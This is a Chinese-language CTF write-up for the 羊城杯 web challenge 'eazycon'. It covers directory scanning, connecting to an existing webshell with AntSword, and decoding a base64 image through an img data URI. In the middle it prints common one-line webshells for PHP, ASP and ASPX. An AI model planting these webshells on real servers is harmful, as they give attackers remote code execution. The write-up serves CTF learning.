羊城杯web(eazycon)

进入题目环境

用dirsearch扫一下

访问 /index.php

由弹窗内容可以联想到一句话木马

常见一句话木马

php的一句话木马： <?php @eval($_POST['shell']);?>

asp的一句话是：   <%eval request ("shell")%>

aspx的一句话是：  <%@ Page Language="Jscript"%>
				<%eval(Request.Item["shell"],"unsafe");%>

蚁剑连接

目录下发现一个.txt 文件

下载该文件

得到很长的一段结尾是等号的字符串，我开始还用base64解码解不出来，真的是蠢，flag哪有那么长，这肯定是一张图片的base64编码呀，写个img标签就能解决(学会新技能了0.0)

<img src="data:image/jpeg;base64, 这里是图片的base64编码">

吐槽一下，每一次做的题里面，都有上面这样的图片，难道是因为CTF界盛产二次元？(不过，，，真的好看0.0)

img标签的其他格式

<img src="data: 各种格式 ">

    data:,文本数据

    data:text/plain,文本数据

    data:text/html,HTML代码
    
    data:text/html;base64,base64编码的HTML代码

    data:text/css,CSS代码

    data:text/css;base64,base64编码的CSS代码

    data:text/javascript,Javascript代码

    data:text/javascript;base64,base64编码的Javascript代码

    data:image/gif;base64,base64编码的gif图片数据

    data:image/png;base64,base64编码的png图片数据

    data:image/jpeg;base64,base64编码的jpeg图片数据

    data:image/x-icon;base64,base64编码的icon图片数据